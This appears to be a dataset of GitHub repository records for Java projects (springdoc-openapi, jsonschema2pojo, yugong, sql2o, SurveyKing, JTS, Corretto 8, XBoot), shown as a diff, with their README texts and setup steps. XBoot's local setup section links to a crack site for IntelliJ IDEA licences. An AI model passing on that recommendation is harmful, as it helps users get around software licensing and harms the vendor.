-* Add the library to the list of your project dependencies. 
(No additional configuration
- is needed)
-
-```xml
-<dependency>
- <groupId>org.springdoc</groupId>
- <artifactId>springdoc-openapi-starter-webmvc-api</artifactId>
- <version>last-release-version</version>
-</dependency>
-```
-
-* This step is optional: For custom path of the OpenAPI documentation in Json format, add
- a custom springdoc property, in your spring-boot configuration file:
-
-```properties
-# /api-docs endpoint custom path
-springdoc.api-docs.path=/api-docs
-```
-
-* This step is optional: If you want to disable `springdoc-openapi` endpoints, add a
- custom springdoc property, in your `spring-boot` configuration file:
-
-```properties
-# disable api-docs
-springdoc.api-docs.enabled=false
-```
-
-## Error Handling for REST using @ControllerAdvice
-
-To generate documentation automatically, make sure all the methods declare the HTTP Code
-responses using the annotation: @ResponseStatus.
-
-## Adding API Information and Security documentation
-
-The library uses spring-boot application auto-configured packages to scan for the
-following annotations in spring beans: OpenAPIDefinition and Info.
-These annotations declare API information: title, version, licence, security, servers,
-tags and externalDocs.
-For better performance of documentation generation, declare `@OpenAPIDefinition`
-and `@SecurityScheme` annotations within a Spring managed bean.
-
-## spring-webflux support with Annotated Controllers
-
-* Documentation can be available in yaml format as well, on the following path:
- /v3/api-docs.yaml
-* Add the library to the list of your project dependencies (No additional configuration
- is needed)
-
-```xml
-<dependency>
- <groupId>org.springdoc</groupId>
- <artifactId>springdoc-openapi-starter-webflux-ui</artifactId>
- <version>last-release-version</version>
-</dependency>
-```
-
-* This step is optional: For custom path of the swagger documentation in HTML format, add
- a custom springdoc property, in your spring-boot configuration file:
-
-```properties
-# swagger-ui custom path
-springdoc.swagger-ui.path=/swagger-ui.html
-```
-
-The `springdoc-openapi` libraries are hosted on the Maven Central repository. 
-The artifacts can be viewed and accessed at the following locations:
-
-Releases:
-
-* [https://s01.oss.sonatype.org/content/groups/public/org/springdoc/](https://s01.oss.sonatype.org/content/groups/public/org/springdoc/)
-
-Snapshots:
-
-* [https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/](https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/)
-
-# Acknowledgements
-
-## Contributors
-
-springdoc-openapi is relevant and updated regularly due to the valuable contributions from
-its [contributors](https://github.com/springdoc/springdoc-openapi/graphs/contributors).
-
-Thank you all for your support!
-
-## Additional Support
-
-* [Spring Team](https://spring.io/team) - Thanks for their support by sharing all relevant
-  resources around Spring projects.
-* [JetBrains](https://www.jetbrains.com/?from=springdoc-openapi) - Thanks a lot for
-  supporting the springdoc-openapi project.
-
-![JetBrains logo](https://springdoc.org/img/jetbrains.svg)
-",0
-joelittlejohn/jsonschema2pojo,"Generate Java types from JSON or JSON Schema and annotate those types for data-binding with Jackson, Gson, etc",2013-06-22T22:28:53Z,,"# jsonschema2pojo [![Build Status](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml/badge.svg?query=branch%3Amaster)](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml?query=branch%3Amaster) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.jsonschema2pojo/jsonschema2pojo/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.jsonschema2pojo%22)
-
-_jsonschema2pojo_ generates Java types from JSON Schema (or example JSON) and can annotate those types for data-binding with Jackson 2.x or Gson.
-
-### [Try jsonschema2pojo online](http://jsonschema2pojo.org/) 
or `brew install jsonschema2pojo`
-
-You can use jsonschema2pojo as a Maven plugin, an Ant task, a command line utility, a Gradle plugin or embedded within your own Java app. The [Getting Started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started) guide will show you how.
-
-A very simple Maven example:
-```xml
-<plugin>
-    <groupId>org.jsonschema2pojo</groupId>
-    <artifactId>jsonschema2pojo-maven-plugin</artifactId>
-    <version>1.2.1</version>
-    <configuration>
-        <sourceDirectory>${basedir}/src/main/resources/schema</sourceDirectory>
-        <targetPackage>com.example.types</targetPackage>
-    </configuration>
-    <executions>
-        <execution>
-            <goals>
-                <goal>generate</goal>
-            </goals>
-        </execution>
-    </executions>
-</plugin>
-```
-
-A very simple Gradle example:
-
-```groovy
-plugins {
-    id ""java""
-    id ""org.jsonschema2pojo"" version ""1.2.1""
-}
-
-repositories {
-    mavenCentral()
-}
-
-dependencies {
-    implementation 'com.fasterxml.jackson.core:jackson-databind:2.15.2'
-}
-
-jsonSchema2Pojo {
-    targetPackage = 'com.example'
-}
-```
-
-Useful pages:
- * **[Getting started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started)**
- * **[How to contribute](https://github.com/joelittlejohn/jsonschema2pojo/blob/master/CONTRIBUTING.md)**
- * [Reference](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Reference)
- * [Latest Javadocs](https://joelittlejohn.github.io/jsonschema2pojo/javadocs/1.2.1/)
- * [Documentation for the Maven plugin](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/generate-mojo.html)
- * [Documentation for the Gradle plugin](https://github.com/joelittlejohn/jsonschema2pojo/tree/master/jsonschema2pojo-gradle-plugin#usage)
- * [Documentation for the Ant task](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/Jsonschema2PojoTask.html)
-
-Project resources:
- * [Downloads](https://github.com/joelittlejohn/jsonschema2pojo/releases)
- * [Mailing list](https://groups.google.com/forum/#!forum/jsonschema2pojo-users)
-
-Special thanks:
-* unkish
-* Thach Hoang
-* Dan Cruver
-* Ben Manes
-* Sam Duke
-* Duane Zamrok
-* Christian Trimble
-* YourKit, who support this project through a free license for the [YourKit Java 
Profiler](https://www.yourkit.com/java/profiler). - -Licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0). -",0 -secure-software-engineering/FlowDroid,FlowDroid Static Data Flow Tracker,2018-01-08T16:11:45Z,,,0 -alibaba/yugong,"阿里巴巴去Oracle数据迁移同步工具(全量+增量,目标支持MySQL/DRDS)",2016-03-02T07:31:00Z,,"## 背景 - -2008年,阿里巴巴开始尝试使用 MySQL 支撑其业务,开发了围绕 MySQL 相关的中间件和工具,Cobar/TDDL(目前为阿里云DRDS产品),解决了单机 Oracle 无法满足的扩展性问题,当时也掀起一股去IOE项目的浪潮,愚公这项目因此而诞生,其要解决的目标就是帮助用户完成从 Oracle 数据迁移到 MySQL 上,完成去 IOE 的重要一步工作。 - -## 项目介绍 - - -名称:   yugong - -译意:   愚公移山 - -语言:   纯java开发 - -定位:   数据库迁移 (目前主要支持oracle / mysql / DRDS) - -## 项目介绍 - - -整个数据迁移过程,分为两部分: - -1. 全量迁移 -2. 增量迁移 - -![](https://camo.githubusercontent.com/9a9cc09c5a7598239da20433857be61c54481b9c/687474703a2f2f646c322e69746579652e636f6d2f75706c6f61642f6174746163686d656e742f303131352f343531312f31306334666134632d626634342d333165352d623531312d6231393736643164373636392e706e67) - -过程描述: - -1. 增量数据收集 (创建oracle表的增量物化视图) -2. 进行全量复制 -3. 进行增量复制 (可并行进行数据校验) -4. 原库停写,切到新库 - -## 架构 - - -![](http://dl2.iteye.com/upload/attachment/0115/5473/8532d838-d4b2-371b-af9f-829d4127b1b8.png){width=""584"" -height=""206""} - -说明:  - -1. 一个Jvm Container对应多个instance,每个instance对应于一张表的迁移任务 -2.  instance分为三部分 - a.  extractor  (从源数据库上提取数据,可分为全量/增量实现) - b.  translator  (将源库上的数据按照目标库的需求进行自定义转化) - c.  applier  (将数据更新到目标库,可分为全量/增量/对比的实现) - -## 方案设计 - -[DevDesign](https://github.com/alibaba/yugong/wiki/DevDesign) - -## 快速开始 - -[QuickStart](https://github.com/alibaba/yugong/wiki/QuickStart) - -## 运维管理 - -[AdminGuide](https://github.com/alibaba/yugong/wiki/AdminGuide) - -## 性能报告 - -[Performance](https://github.com/alibaba/yugong/wiki/Performance) - -## 相关资料 - -1. yugong简单介绍ppt: [ppt](https://github.com/alibaba/yugong/blob/master/docs/yugong_Intro.ppt?raw=true) -2. [分布式关系型数据库服务DRDS](https://www.aliyun.com/product/drds) - (前身为阿里巴巴公司的Cobar/TDDL的演进版本, 基本原理为MySQL分库分表) - -## 沟通与交流 - -1. 
详见 wiki home 页
-
-",0
-aaberg/sql2o,"sql2o is a small library, which makes it easy to convert the result of your sql-statements into objects. No resultset hacking required. Kind of like an orm, but without the sql-generation capabilities. Supports named parameters.",2011-05-18T21:13:57Z,,"# sql2o [![Github Actions Build](https://github.com/aaberg/sql2o/actions/workflows/pipeline.yml/badge.svg)](https://github.com/aaberg/sql2o/actions) [![Maven Central](https://img.shields.io/maven-central/v/org.sql2o/sql2o.svg)](https://search.maven.org/search?q=g:org.sql2o%20a:sql2o)
-
-Sql2o is a small Java library with the purpose of making database interaction easy.
-When fetching data from the database, the ResultSet will automatically be filled into your POJO objects.
-Kind of like an ORM, but without the SQL generation capabilities.
-Sql2o requires Java 7 or 8 to run. Java versions later than 8 may work, but are currently not supported.
-
-# Announcements
-*2024-03-12* | [Sql2o 1.7.0 was released](https://github.com/aaberg/sql2o/discussions/365)
-
-# Examples
-
-Check out the [sql2o website](http://www.sql2o.org) for examples.
-
-# Coding guidelines
-
-When hacking sql2o, please follow [these coding guidelines](https://github.com/aaberg/sql2o/wiki/Coding-guidelines).
-",0
-javahuang/SurveyKing,Make a better survey system.,2021-09-06T13:34:14Z,,"# 卷王
-
-简体中文 | [English](./README.en-us.md)
-
-## 功能最强大的调查问卷系统和考试系统
-
-[点击](https://wj.surveyking.cn/s/start)卷王问卷考试系统-快速开始
-
-需要您的 star ⭐️⭐️⭐️ 支持鼓励 🙏🙏🙏,**右上角点 Star (非强制)加QQ群(1074277968)获取最新的数据库脚本**。
-
-## 快速开始(一键部署)
-
-### 🚀 1 分钟快速体验调查问卷系统(无需安装数据库)
-
-1. 下载卷王快速体验安装包(加群)
-2. 解压,双击运行 start.bat
-3. 
打开浏览器访问 [http://localhost:1991](http://localhost:1991),输入账号密码: *admin*/*123456* - -### 一键 docker 部署 - -```bash -docker run -p 1991:1991 surveyking/surveyking -``` - -## 特性 - -- 🥇 支持 20 多种题型,如填空、选择、下拉、级联、矩阵、分页、签名、题组、上传、[横向填空](https://wj.surveyking.cn/s/EMqvs7)等 -- 🎉 多种创建问卷方式,Excel导入问卷、文本导入问卷、在线编辑器编辑问卷 -- 💪 多种问卷设置,支持白名单答卷、公开查询、答卷限制等 -- 🎇 数据,支持问卷数据新增、编辑、标记、导出、打印、预览和打包下载附件 -- 🎨 报表,支持对问题实时统计分析并以图形(条形图、柱形图、扇形图)、表格的形式展示输出和导出 -- 🚀 安装部署简单(**最快 1 分钟部署**),支持一键windows部署、一键docker部署、前后端分离部署、单jar部署、二级目录部署 -- 🥊 响应式布局,所有页面完美适配电脑端和移动端(包含问卷编辑、设置、答卷) -- 👬 支持多人协作管理问卷 -- 🎁 后端支持多种数据库,可支持所有带有 jdbc 驱动的关系型数据库 -- 🐯 安全、可靠、稳定、高性能的后端 API 服务 -- 🙆 支持完善的 RBAC 权限控制 -- 🦋 支持可视化配置问卷跳转和显示逻辑,以及通过公式实现自定义逻辑(卷王的逻辑设置比目前主流商业调查问卷系统强大的多) - - **显示隐藏逻辑** - - **值计算逻辑** 动态计算问题答案,从最简单的根据身高体重计算BMI,到复杂的根据多个问题答案组合逻辑和数值实现复杂的运算 - - **文本替换逻辑** 动态显示题目内容 - - **值校验逻辑** 可以根据其他问题答案来判断当前问题是否有效 - - **必填逻辑** 动态判断当前问题是否必填 - - **选项自动勾选逻辑** 根据其他问题和选项答案自动勾选 - - **选项显示隐藏逻辑** 动态的显示或者隐藏选项 - - **结束问卷逻辑** - - **跳转逻辑** 动态跳转 - - **结束问卷自定义提示语逻辑** 答卷后,可以根据问卷答案或者考试分数来显示不同的提示语信息 - - **自定义跳转链接逻辑** 答卷后,可以根据问卷答案或者考试分数来跳转到不同的链接,且支持携带答案参数 -- 🌈 支持选项唯一设置,多问卷数据关联查询、更新和删除,考试自动算分,自定义提示语,自定义跳转链接等等 - -## 问卷产品对比 - -| | 问卷网 | 腾讯问卷 | 问卷星 | 金数据 | 卷王 | -| --------------- | ------ | -------- | ------ | ------ | ---- | -| 问卷调查 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | -| 在线考试 | ✔️ | ❌ | ✔️ | ✔️ | ✔️ | -| 投票 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | -| 支持题型 | 🥇 | 🥉 | 🥇 | 🥈 | 🥈 | -| 题型设置 | 🥇 | 🥉 | 🥇 | 🥇 | 🥇 | -| 自动计算 | ❌ | ❌ | 🥉 | 🥈 | 🥇 | -| 逻辑设置 | 🥈 | 🥈 | 🥈 | 🥈 | 🥇 | -| 自定义校验 | ❌ | ❌ | ❌ | ❌ | ✔️ | -| 自定义导出 | 🥈 | ❌ | ❌ | 🥉 | 🥇 | -| 手机端编辑 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | -| 公开查询(快查) | ✔️ | ❌ | ✔️ | ❌ | ✔️ | -| 私有部署 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 🆓 | - -注: 上表与卷王对比的全部是商业问卷产品,他们有很多地方值得卷王学习,仅列出部分主要功能供大家参考,如果对结果有疑问,可以点击对应产品的链接自行对比体验。 - -🥇强 🥈中 🥉弱 - -## 友情推荐 - -[专注于中台化架构的低代码生成工具](https://gitee.com/orangeform/orange-admin) - -## 预览截图 - -* 考试系统预览 - - - - - - - - - - - - - - - - - - -
- -* 调查问卷预览 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-",0 -shatyuka/Zhiliao,知乎去广告Xposed模块,2020-11-09T07:17:35Z,,"# 知了 - -知乎去广告Xposed模块 - -[![Chat](https://img.shields.io/badge/Telegram-Chat-blue.svg?logo=telegram)](https://t.me/joinchat/OibCWxbdCMkJ2fG8J1DpQQ) -[![Subscribe](https://img.shields.io/badge/Telegram-Subscribe-blue.svg?logo=telegram)](https://t.me/zhiliao) -[![Download](https://img.shields.io/github/v/release/shatyuka/Zhiliao?label=Download)](https://github.com/shatyuka/Zhiliao/releases/latest) -[![Stars](https://img.shields.io/github/stars/shatyuka/Zhiliao?label=Stars)](https://github.com/shatyuka/Zhiliao) -[![License](https://img.shields.io/github/license/shatyuka/Zhiliao?label=License)](https://choosealicense.com/licenses/gpl-3.0/) - -## 功能 - -- 广告 - - 去启动页广告 - - 去信息流广告 - - 去回答列表广告 - - 去评论广告 - - 去分享广告 - - 去回答底部广告 - - 去搜索广告 -- 其他 - - 过滤视频 - - 过滤文章 - - 去信息流会员推荐 - - 去回答圈子 - - 去商品推荐 - - 去相关搜索 - - 去关键字搜索 - - 直接打开外部链接 - - 禁止切换色彩模式 - - 显示卡片类别 - - 状态栏沉浸 - - 禁止进入全屏模式 - - 解锁第三方登录 -- 界面净化 - - 移除直播按钮 - - 不显示小红点 - - 隐藏会员卡片 - - 隐藏热点通知 - - 精简文章页面 - - 隐藏置顶热门 - - 隐藏混合卡片 -- 导航栏 - - 隐藏会员按钮 - - 隐藏视频按钮 - - 隐藏关注按钮 - - 隐藏发布按钮 - - 隐藏发现按钮 - - 禁用活动主题 - - 隐藏导航栏突起 -- 左右划 - - 左右划切换回答 - - 移除下一个回答按钮 -- 自定义过滤 -- 注入JS脚本 -- 清理临时文件 - -## 帮助 -[Github Wiki](https://github.com/shatyuka/Zhiliao/wiki) - -## 下载 -[Github Release](https://github.com/shatyuka/Zhiliao/releases/latest) - -[Xposed Repo](https://repo.xposed.info/module/com.shatyuka.zhiliao) - -[蓝奏云](https://wwa.lanzoux.com/b00tscbwd) 密码:1hax - -## License - -This project is licensed under the [GNU General Public Licence, version 3](https://choosealicense.com/licenses/gpl-3.0/). 
-",0 -zhoutaoo/SpringCloud,基于SpringCloud2.1的微服务开发脚手架,整合了spring-security-oauth2、nacos、feign、sentinel、springcloud-gateway等。服务治理方面引入elasticsearch、skywalking、springboot-admin、zipkin等,让项目开发快速进入业务开发,而不需过多时间花费在架构搭建上。持续更新中,2017-07-23T14:28:08Z,,,0 -locationtech/jts,The JTS Topology Suite is a Java library for creating and manipulating vector geometry.,2016-01-25T18:08:41Z,,"JTS Topology Suite -================== - -The JTS Topology Suite is a Java library for creating and manipulating vector geometry. It also provides a comprehensive set of geometry test cases, and the TestBuilder GUI application for working with and visualizing geometry and JTS functions. - -![JTS logo](jts_logo.png) - -[![Travis Build Status](https://api.travis-ci.org/locationtech/jts.svg)](http://travis-ci.org/locationtech/jts) [![GitHub Action Status](https://github.com/locationtech/jts/workflows/GitHub%20CI/badge.svg)](https://github.com/locationtech/jts/actions) - -[![Join the chat at https://gitter.im/locationtech/jts](https://badges.gitter.im/locationtech/jts.svg)](https://gitter.im/locationtech/jts?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) - - -JTS is a project in the [LocationTech](http://www.locationtech.org) working group of the Eclipse Foundation. - -![LocationTech](locationtech_mark.png) - -## Requirements - -Currently JTS targets Java 1.8 and above. 
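
The overview above describes JTS as a library for creating and manipulating vector geometry. As a minimal, hedged sketch of what that looks like in practice (it assumes a JTS artifact such as `org.locationtech.jts:jts-core` is on the classpath; the example geometries are arbitrary and not taken from the README):

```java
import org.locationtech.jts.geom.Geometry;
import org.locationtech.jts.io.WKTReader;

public class JtsIntersectionDemo {
    public static void main(String[] args) throws Exception {
        WKTReader reader = new WKTReader();

        // Two overlapping 2x2 squares, described in Well-Known Text (WKT).
        Geometry a = reader.read("POLYGON ((0 0, 0 2, 2 2, 2 0, 0 0))");
        Geometry b = reader.read("POLYGON ((1 1, 1 3, 3 3, 3 1, 1 1))");

        // Compute their overlap; the shared region is a 1x1 square.
        Geometry overlap = a.intersection(b);
        System.out.println(overlap);            // WKT of the intersection polygon
        System.out.println(overlap.getArea());  // 1.0
    }
}
```

`WKTReader` and `Geometry` live in the `org.locationtech.jts.io` and `org.locationtech.jts.geom` packages of recent JTS releases; older, pre-LocationTech versions used the `com.vividsolutions.jts` package prefix instead.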
- -## Resources - -### Code -* [GitHub Repo](https://github.com/locationtech/jts) -* [Maven Central group](https://mvnrepository.com/artifact/org.locationtech.jts) - -### Websites -* [LocationTech Home](https://locationtech.org/projects/technology.jts) -* [GitHub web site](https://locationtech.github.io/jts/) - -### Communication -* [Mailing List](https://accounts.eclipse.org/mailing-list/jts-dev) -* [Gitter Channel](https://gitter.im/locationtech/jts) - -### Forums -* [Stack Overflow](https://stackoverflow.com/questions/tagged/jts) -* [GIS Stack Exchange](https://gis.stackexchange.com/questions/tagged/jts-topology-suite) - -## License - -JTS is open source software. It is dual-licensed under: - -* [Eclipse Public License 2.0](https://www.eclipse.org/legal/epl-v20.html) -* [Eclipse Distribution License 1.0](http://www.eclipse.org/org/documents/edl-v10.php) (a BSD Style License) - -See also: - -* [License details](LICENSES.md) -* Licensing [FAQ](FAQ-LICENSING.md) - -## Documentation - -* [**Javadoc**](https://locationtech.github.io/jts/javadoc) for the latest version of JTS -* [**FAQ**](https://locationtech.github.io/jts/jts-faq.html) - Frequently Asked Questions -* [**User Guide**](USING.md) - Installing and using JTS -* [**Tools**](doc/TOOLS.md) - Guide to tools included with JTS -* [**Developing Guide**](DEVELOPING.md) - how to build and develop for JTS -* [**Upgrade Guide**](MIGRATION.md) - How to migrate from previous versions of JTS - -## History - -* [**Version History**](https://github.com/locationtech/jts/blob/master/doc/JTS_Version_History.md) -* History from the previous JTS SourceForge repo is in the branch [`_old/history`](https://github.com/locationtech/jts/tree/_old/history) -* Older versions of JTS can be found on SourceForge -* There is an archive of distros of older versions [here](https://github.com/dr-jts/jts-versions) - -## Contributing - -If you are interested in contributing to JTS please read the [**Contributing Guide**](CONTRIBUTING.md). 
- -## Downstream Projects - -### Derivatives (ports to other languages) -* [**GEOS**](https://trac.osgeo.org/geos) - C++ -* [**NetTopologySuite**](https://github.com/NetTopologySuite/NetTopologySuite) - .NET -* [**JSTS**](https://github.com/bjornharrtell/jsts) - JavaScript -* [**dart_jts**](https://github.com/moovida/dart_jts) - Dart - -### Via GEOS -* [**Shapely**](https://github.com/Toblerity/Shapely) - Python wrapper of GEOS -* [**R-GEOS**](https://cran.r-project.org/web/packages/rgeos/index.html) - R wrapper of GEOS -* [**rgeo**](https://github.com/rgeo/rgeo) - Ruby wrapper of GEOS -* [**GEOSwift**](https://github.com/GEOSwift/GEOSwift)- Swift library using GEOS - -There are many projects using GEOS - for a list see the [GEOS wiki](https://trac.osgeo.org/geos/wiki/Applications). - - -",0 -corretto/corretto-8,"Amazon Corretto 8 is a no-cost, multi-platform, production-ready distribution of OpenJDK 8",2018-11-07T19:49:10Z,,"## Corretto 8 - -Amazon Corretto is a no-cost, multiplatform, production-ready distribution of the Open Java Development Kit (OpenJDK). Corretto is used internally at Amazon for production services. With Corretto, you can develop and run Java applications on operating systems such as Amazon Linux 2, Windows, and macOS. - -The latest binary Corretto 8 release builds can be downloaded from [https://github.com/corretto/corretto-8/releases](https://github.com/corretto/corretto-8/releases). - -Documentation is available at [https://docs.aws.amazon.com/corretto](https://docs.aws.amazon.com/corretto). - -### Licenses and Trademarks - -Please read these files: ""LICENSE"", ""THIRD_PARTY_README"", ""ASSEMBLY_EXCEPTION"", ""TRADEMARKS.md"". - -### Branches - -_develop_ -: The default branch. It absorbs active development contributions from forks or topic branches via pull requests that pass smoke testing and are accepted. - -_master_ -: The stable branch. Starting point for the release process. 
It absorbs contributions from the develop branch that pass more thorough testing and are selected for releasing.
-
-_ga-release_
-: The source code of the GA release on 01/31/2019.
-
-_preview-release_
-: The source code of the preview release on 11/14/2018.
-
-_release-8.XXX.YY.Z_
-: The source code for each release is recorded by a branch or a tag with a name of this form. XXX stands for the OpenJDK 8 update number, YY for the OpenJDK 8 build number, and Z for the Corretto-specific revision number. The latter starts at 1 and is incremented in subsequent releases as long as the update and build number remain constant.
-
-### OpenJDK Readme
-```
-
-Welcome to the JDK!
-===================
-
-For build instructions please see https://openjdk.java.net/groups/build/doc/building.html,
-or either of these files:
-
-- doc/building.html (html version)
-- doc/building.md (markdown version)
-
-See https://openjdk.java.net for more information about the OpenJDK Community and the JDK.
-```
-",0
-HelloWorld521/Java,java项目实战练习,2016-12-08T14:01:46Z,,"# Java
-
-##### [中文](README_ZH.md)
-
-## Project Description
-
-Below are some of my Java project exercise codes. I would like to share them with everyone, and I hope we can all improve together!
-
-## Java Projects
-
-* [swagger2-boot-starter](https://github.com/HelloWorld521/swagger2-boot-starter)
-
-* [SpringBoot-Shiro](./springboot-shiro/)
-
-* [SECKILL](./seckill/)
-
-* [Woss2.0 ](./woss/)
-
-* [tomcatServlet3.0 Web Server](./tomcatServer3.0/)
-
-* [ServletAjax ](./ServletAjax/)
-
-* [JspChat jsp Chatroom](./JspChat/)
-
-* [eStore library system](./estore/)
-
-* [checkcode Java captcha code generator](./checkcode/)
-
-* [IMOOCSpider easy internet spider](./IMOOCSpider/)
-
-## Last
-
-If any of the projects above helps you out, please click ""Star"" at the top right-hand side. Thank you! 
-",0 -Exrick/xboot,基于Spring Boot 2.x的一站式前后端分离快速开发平台XBoot 微信小程序+Uniapp 前端:Vue+iView Admin 后端:Spring Boot 2.x/Spring Security/JWT/JPA+Mybatis-Plus/Redis/Elasticsearch/Activiti 分布式限流/同步锁/验证码/SnowFlake雪花算法ID 动态权限 数据权限 工作流 代码生成 定时任务 社交账号 短信登录 单点登录 OAuth2开放平台 客服机器人 数据大屏 暗黑模式,2018-04-23T14:44:18Z,,"# XBoot -[![AUR](https://img.shields.io/badge/GPL-v3-red)](https://github.com/Exrick/xmall/blob/master/License) -[![](https://img.shields.io/badge/Author-Exrick-orange.svg)](http://blog.exrick.cn) -[![](https://img.shields.io/badge/version-3.3.4-brightgreen.svg)](https://github.com/Exrick/x-boot) -[![GitHub stars](https://img.shields.io/github/stars/Exrick/x-boot.svg?style=social&label=Stars)](https://github.com/Exrick/x-boot) -[![GitHub forks](https://img.shields.io/github/forks/Exrick/x-boot.svg?style=social&label=Fork)](https://github.com/Exrick/x-boot) - -### 宣传视频 -- [作者亲自制作XBoot文字快闪宣传视频](http://www.bilibili.com/av30284667) -- [作者亲自制作其他项目宣传视频](https://www.bilibili.com/video/av23121122/) -### 宣传官网 -- 官网地址:http://xb.exrick.cn -- 官网源码:https://github.com/Exrick/xboot-show -### 在线Demo -- 在线Demo:http://xboot.exrick.cn -- 单点登录测试页:http://sso.exrick.cn -- 统一认证平台访问地址:http://xboot.exrick.cn/authorize -### 最新最全面在线文档 -https://www.kancloud.cn/exrick/xboot/content -### 前台基于Vue+iView项目地址: [xboot-front](https://github.com/Exrick/xboot-front) -### 版本说明 -- xboot-fast:单应用版本 -- xboot-module:多模块版本 -### 项目简介 -- [x] 代码拥有详细注释 无复杂逻辑 核心使用 SpringBoot 2.4.8 -- [x] JWT / 基于Redis可配置单设备登录Token交互 任意切换 提供开放平台、OAuth2认证中心 支持点单登录 -- [x] JPA + Mybatis-Plus 任意切换 -- [x] 操作日志记录方式任意切换Mysql或Elasticseach记录 -- [x] Java、Vue、SQL代码生成效率翻四倍 -- [x] 动态权限管理、多维度轻松控制权限按钮显示、数据权限管理 -- [x] 支持社交账号、短信等多方式登录 不干涉原用户数据 实现第三方账号管理 -- [x] 基于Websocket消息推送管理、基于Quartz定时任务管理、数据字典管理 -- [x] 后台提供分布式限流、同步锁、验证码等工具类 前端提供丰富Vue模版 -- [x] 可动态配置短信、邮件、Vaptcha验证码等 -- [x] 为什么要前后端分离 - - 都什么时代了还在用JQuery? 
- -![](https://ooo.0o0.ooo/2019/04/29/5cc70cac4b7a4.png) - -### 截图预览 - -- PC - -![QQ截图20180826163917.png](https://ooo.0o0.ooo/2021/07/01/t6RXqn8LeaY5Nu1.png) - -![QQ截图20180826164058.png](https://ooo.0o0.ooo/2021/07/01/TQZqrxog4ufX2SR.png) - -![QQ截图20180826164144.png](https://ooo.0o0.ooo/2021/07/01/t7RdWhkbzZCawce.png) - -- iPad Mini 5 - - - -- iPhone X - - - - -### [完整版截图细节展示](https://github.com/Exrick/x-boot/wiki/%E5%AE%8C%E6%95%B4%E7%89%88%E6%88%AA%E5%9B%BE%E7%BB%86%E8%8A%82%E5%B1%95%E7%A4%BA) - -### 系统架构 - - - -### 前端所用技术 -- Vue 2.6.x、Vue Cli 4.x、iView、iview-admin、iview-area、Vuex、Vue Router、ES6、webpack、axios、echarts、cookie等 -- 前台为基于Vue+iView的独立项目请跳转至 [xboot-front](https://github.com/Exrick/xboot-front) 项目仓库查看 -### 后端所用技术 - - - -##### 各框架依赖版本皆使用目前最新版本 -- Spring Boot -- SpringMVC -- Spring Security -- [Spring Data JPA](https://docs.spring.io/spring-data/jpa/docs/2.2.2.RELEASE/reference/html/) -- [MyBatis-Plus](http://mp.baomidou.com):已更新至3.x版本 -- [Redis](https://github.com/Exrick/xmall/blob/master/study/Redis.md) -- [Elasticsearch](https://github.com/Exrick/xmall/blob/master/study/Elasticsearch.md):基于Lucene分布式搜索引擎 -- [Druid](http://druid.io/):阿里高性能数据库连接池(偏监控 注重性能可使用默认HikariCP) [Druid配置官方中文文档](https://github.com/alibaba/druid/tree/master/druid-spring-boot-starter) -- [Json Web Token(JWT)](https://jwt.io/) -- [Quartz](http://www.quartz-scheduler.org):定时任务 -- [Beetl](http://ibeetl.com/guide/#beetl):模版引擎 代码生成使用 -- [Thymeleaf](https://www.thymeleaf.org/):发送模版邮件使用 -- [Hutool](http://hutool.mydoc.io/):Java工具包 -- [Jasypt](https://github.com/ulisesbocchio/jasypt-spring-boot):配置文件加密(thymeleaf作者开发) -- [Swagger2](https://github.com/Exrick/xmall/blob/master/study/Swagger2.md):Api文档生成 -- MySQL -- [Nginx](https://github.com/Exrick/xmall/blob/master/study/Nginx.md) -- [Maven](https://github.com/Exrick/xmall/blob/master/study/Maven.md) -- 第三方SDK或服务 - - [七牛云文件存储服务](https://developer.qiniu.com/kodo/sdk/1239/java) - - 
[腾讯位置服务](https://lbs.qq.com/webservice_v1/guide-ip.html):需申请填入key后免费使用 - - 完整版 - - [Vaptcha人机验证码](https://www.vaptcha.com/) - - [阿里云短信服务](https://dysms.console.aliyun.com) -- 其它开发工具 - - [Lombok](https://projectlombok.org/) - - [JRebel](https://github.com/Exrick/xmall/blob/master/study/JRebel.md):开发秒级热部署 - - [阿里JAVA开发规约插件](https://github.com/alibaba/p3c) - -### 最新最全面在线文档 - -> 第一时间更新,文档永不收费 - -https://www.kancloud.cn/exrick/xboot/content - -### 本地运行部署 -- 安装依赖并启动:[Redis](https://github.com/Exrick/xmall/blob/master/study/Redis.md)、[Elasticsearch](https://github.com/Exrick/xmall/blob/master/study/Elasticsearch.md)(当配置使用ES记录日志时需要) -- [Maven安装和在IDEA中配置](https://github.com/Exrick/xmall/blob/master/study/Maven.md) -- 建议使用IDEA([破解/免费注册](http://idea.lanyus.com/)) 安装 `Lombok` 插件后导入该Maven项目 若未自动下载依赖请在根目录下执行 `mvn install` 命令 -- MySQL数据库新建 `xboot` 数据库,配置文件已开启ddl自动生成表结构但无初始数据,请记得运行导入xboot.sql文件(当报错找不到Quartz相关表时请设置数据库忽略大小写或额外重新导入quartz.sql) -- 修改配置文件 `application.yml` 相应配置,其中有详细注释,所有配置只需在这里修改 -- 编译器中启动运行 `XbootApplication.java` 或根目录下执行命令 `mvn spring-boot:run` 默认端口8888 访问接口文档 `http://localhost:8888/doc.html` 说明启动成功 管理员账密admin|123456 -- 前台页面请启动基于Vue的 [xboot-front](https://github.com/Exrick/xboot-front) 项目,并修改其接口代理配置 -> 温馨提示:若更新代码后报错,请记得更新sql并清空Redis缓存 -### 开发指南及相关技术栈文档 -- 